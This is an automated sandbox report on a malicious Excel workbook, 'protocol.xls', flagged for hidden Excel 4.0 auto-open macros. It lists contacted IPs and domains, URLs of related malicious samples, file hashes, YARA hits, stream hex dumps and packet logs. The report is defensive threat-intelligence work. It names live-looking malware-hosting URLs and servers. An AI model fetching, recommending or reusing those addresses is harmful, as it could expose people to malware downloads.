                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    162.241.2.103
                    ost.net.brUnited States
                    26337OIS1USfalse
                    199.79.62.121
                    maberic.comUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    192.99.46.215
                    atochagaleria.com.arCanada
                    16276OVHFRtrue

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:510734
                    Start date:28.10.2021
                    Start time:07:38:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:protocol.xls
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal76.expl.winXLS@7/4@3/3
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xls
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:38:21API Interceptor386x Sleep call for process: regsvr32.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    162.241.2.103Order600567.exeGet hashmaliciousBrowse
                    • www.jogocertoptjc.com/dt9v/?9r=/6DROtFkY+DQN4u29C9TmrDbaQdWjbvTVyHiS8axtLai07FkaYsNfQsdClIJHXBP79fD&yt=WN9pTDLhcH
                    199.79.62.12115Payment Notification Swift CopyX20 Confirmation.exeGet hashmaliciousBrowse
                    • alsaifpetrochem.com/zlokky/fre.php
                    192.99.46.2155rNPlfqHxQ.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    WaPWtyR1ON.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    5rNPlfqHxQ.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    xBrGSNXGQ3.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    WaPWtyR1ON.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    xBrGSNXGQ3.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    5fRfUQrSRk.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    8XpkPAA80t.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    5fRfUQrSRk.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    8XpkPAA80t.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    HBftgCs83Q.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    HBftgCs83Q.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    422RklrdvM.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    rLJ1CoEZEp.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    422RklrdvM.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    rLJ1CoEZEp.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    AJmEJMqAR9.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    fFnK0eybPw.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    AJmEJMqAR9.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/
                    fFnK0eybPw.docGet hashmaliciousBrowse
                    • benitezseguros.com.ar/dkywlkxs/Gd/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    maberic.comprotocol-1096018033.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    ost.net.brprotocol-1096018033.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    atochagaleria.com.arprotocol-1096018033.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 192.99.46.215

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    OIS1USprotocol-1096018033.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    POIM101385.exeGet hashmaliciousBrowse
                    • 192.185.147.203
                    USD 58,508.80.exeGet hashmaliciousBrowse
                    • 192.185.147.203
                    purchase order.exeGet hashmaliciousBrowse
                    • 192.185.147.203
                    20211020 Copy of Customer transfer.exeGet hashmaliciousBrowse
                    • 192.185.147.203
                    pGaL44AsT9.exeGet hashmaliciousBrowse
                    • 162.241.85.108
                    ITFfhzMV0F.exeGet hashmaliciousBrowse
                    • 162.241.203.130
                    dtMT5xGa54.exeGet hashmaliciousBrowse
                    • 162.241.85.108
                    XWnSilQ3eG.exeGet hashmaliciousBrowse
                    • 192.185.147.20
                    Payment.exeGet hashmaliciousBrowse
                    • 162.241.2.213
                    INVOICE.exeGet hashmaliciousBrowse
                    • 162.241.2.213
                    vNBfeEsb8L.docGet hashmaliciousBrowse
                    • 162.241.85.65
                    c0zG2sQGfpll1oV.exeGet hashmaliciousBrowse
                    • 162.241.2.213
                    BxZ4Gj074H.exeGet hashmaliciousBrowse
                    • 192.185.147.20
                    Payment.exeGet hashmaliciousBrowse
                    • 162.241.2.213
                    PUBLIC-DOMAIN-REGISTRYUSRevised Purchase Order EU No.268766GMKD.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    DHL Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Payment_Receipt_ 1791.xlsGet hashmaliciousBrowse
                    • 162.215.252.35
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 199.79.62.121
                    PO#098273.htmlGet hashmaliciousBrowse
                    • 208.91.199.181
                    PO#098273.htmlGet hashmaliciousBrowse
                    • 208.91.199.181
                    Sales_ReceiptX0480.xlsGet hashmaliciousBrowse
                    • 199.79.63.90
                    PaymentXAdviceX-RefXGLV403445242X.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Purchase Order 3920.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    REVISED PURCHASE ORDER 26 PRECIOUSE STONE 65441QQMD.docGet hashmaliciousBrowse
                    • 208.91.199.224
                    tools-2123227448.xlsGet hashmaliciousBrowse
                    • 162.215.253.110
                    tools-2123227448.xlsGet hashmaliciousBrowse
                    • 162.215.253.110
                    RFQ_PI02102110.exeGet hashmaliciousBrowse
                    • 162.215.249.113
                    REVISE INVOICE_09812300.exeGet hashmaliciousBrowse
                    • 111.118.215.189
                    lCFjxhAqu3.exeGet hashmaliciousBrowse
                    • 208.91.199.64
                    OVHFRdot#U007eremit-2458 xls.HtmLGet hashmaliciousBrowse
                    • 145.239.131.55
                    SecuriteInfo.com.Drixed-FJXAE4472036314.31475.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJXAE4472036314.31475.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJX22779BFC1D68.14546.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Trojan.Win32.Save.a.28377.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Trojan.Win32.Save.a.28377.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Trojan.Win32.Save.a.16213.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    SecuriteInfo.com.Trojan.Win32.Save.a.16213.dllGet hashmaliciousBrowse
                    • 149.202.179.100
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    protocol-1096018033.xlsGet hashmaliciousBrowse
                    • 192.99.46.215
                    arm7Get hashmaliciousBrowse
                    • 8.33.207.78
                    #U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbsGet hashmaliciousBrowse
                    • 144.217.33.249
                    Byov62cXa1.exeGet hashmaliciousBrowse
                    • 94.23.24.82

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bprotocol-1096018033.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    UW_230 West 41st St_20211027.xlsmGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Sales_Receipt_ 5054.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Payment_Receipt_ 1791.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Early_Access.-3878_20211027.xlsbGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Casting Invite.-859403670_20211027.xlsbGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    protocol-1441399238.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    protocol-1086855687.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Purchase_Order 8328.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    payment.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Sales_ReceiptX0480.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    1.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    1.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    PI 210907-06.docGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    D7yqLbdq4X.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    tools-2123227448.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    guide-2065442538.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    SMC Req Offer.docGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    Purchase Order-262021.docGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215
                    purchase order # 4459.xlsGet hashmaliciousBrowse
                    • 162.241.2.103
                    • 199.79.62.121
                    • 192.99.46.215

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\CD1E.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.1464700112623651
                    Encrypted:false
                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                    Malicious:false
                    Reputation:low
                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\~DF2671737F09DCABAC.TMP
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\~DF9858F0CABAD63058.TMP
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):28672
                    Entropy (8bit):3.293601509610633
                    Encrypted:false
                    SSDEEP:768:RkG/Kpb8rGYrMPe3q7Q0XV5xtezEs/68/dgANZQ47c:R5Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dW
                    MD5:8C23375CF5836B68FB406EFDF3D85D64
                    SHA1:A47461CCABF50C3C897A8C28B38EFC41873792A6
                    SHA-256:F9AB83436C0C8249AB22E8C793CBF6762CB2E543D9F2530AADD3BE64B91115BC
                    SHA-512:5E49700C01CA5479C9ACE8ED4718336B76582B73364147F68A698E09579A3D315A646577FA1CDE1F07511B17A7B0CF98D64EAD597B4E05187BF925AABB656173
                    Malicious:false
                    Reputation:low
                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\Desktop\protocol.xls
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Oct 27 10:45:18 2021, Security: 0
                    Category:dropped
                    Size (bytes):84992
                    Entropy (8bit):6.331531840784684
                    Encrypted:false
                    SSDEEP:1536:85Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgA91vrVmxJiME2GhdD52lZPFu1AOgo+tJ:qKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg3
                    MD5:FCBB9997C6F9C1E1CF03BB7554D83C4B
                    SHA1:6E77EE067BC79ED701E1B5A47B5ACA4835DDEC6F
                    SHA-256:68FAFB14CADA932D9A1C6907B09539764DFB0D598B108554EC6B7AF68F634819
                    SHA-512:043E3C90D9A7291D9705D727F8D636FD100C71E4A4291499109E3843F4926FE1A1D7A96CCAD5A35AF2D711149636259CB7F1C33268B300B9C290BD66C70D5F8F
                    Malicious:true
                    Yara Hits:
                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\protocol.xls, Author: John Lambert @JohnLaTwC
                    • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\protocol.xls, Author: Joe Security
                    Reputation:low
                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=. .....................................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Oct 27 10:45:18 2021, Security: 0
                    Entropy (8bit):6.330898760473774
                    TrID:
                    • Microsoft Excel sheet (30009/1) 78.94%
                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                    File name:protocol.xls
                    File size:84992
                    MD5:93383a84bdf0f5ff68b3bb6e30bcd2bb
                    SHA1:455bb88e45935daa21c2bf86e2b48da0d7627025
                    SHA256:ca641647b3e2102c7b8f0075f46d1e52618f9b597d4e5ca338dcfec8f1210c59
                    SHA512:97f48985f590843852b2a3e3cb4c1708d68ca1dec19e22c4a568d7dffc92a0cbb0b43ce473127f7017ed40e45583e7a80bd9d7da78d25af777edf00280c6782e
                    SSDEEP:1536:c5Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgA91vrVmxJiME2GhdD52lZPFu1AOgo+tO:KKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgI
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4eea286a4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "protocol.xls"

                    Indicators

                    Has Summary Info:True
                    Application Name:Microsoft Excel
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Code Page:1251
                    Author:
                    Last Saved By:
                    Create Time:2015-06-05 18:19:34
                    Last Saved Time:2021-10-27 09:45:18
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Document Code Page:1251
                    Thumbnail Scaling Desired:False
                    Company:
                    Contains Dirty Links:False
                    Shared Document:False
                    Changed Hyperlinks:False
                    Application Version:1048576

                    Streams

                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.517779757698
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . t . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S b u r 1 . . . . . S b u r 2 . . . . . S b u r 3 . . . . . K o n . . . . . D E F W 3 . . .
                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 74 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 31 01 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5SummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.281100084596
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . K . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 74302
                    General
                    Stream Path:Workbook
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:74302
                    Entropy:6.86519694707
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . .
                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 28, 2021 07:39:03.395112991 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.395160913 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:03.395287991 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.413271904 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.413326979 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:03.745589018 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:03.745871067 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.762381077 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.762420893 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:03.762912035 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:03.763031006 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:03.990582943 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.032960892 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:04.205161095 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:04.205240011 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:04.205372095 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.205404043 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.205765009 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.205796957 CEST44349165199.79.62.121192.168.2.22
                    Oct 28, 2021 07:39:04.205847025 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.205904961 CEST49165443192.168.2.22199.79.62.121
                    Oct 28, 2021 07:39:04.412818909 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.412880898 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:04.412975073 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.413942099 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.413970947 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:04.710705996 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:04.710918903 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.725570917 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.725608110 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:04.725991011 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:04.726116896 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.748212099 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:04.792969942 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:06.571579933 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:06.571726084 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:06.571815014 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:06.571852922 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:06.573416948 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:06.573458910 CEST44349166162.241.2.103192.168.2.22
                    Oct 28, 2021 07:39:06.573484898 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:06.573564053 CEST49166443192.168.2.22162.241.2.103
                    Oct 28, 2021 07:39:06.620856047 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.620896101 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:06.620987892 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.622190952 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.622215986 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:06.852251053 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:06.852509022 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.868309021 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.868324041 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:06.868618011 CEST44349167192.99.46.215192.168.2.22
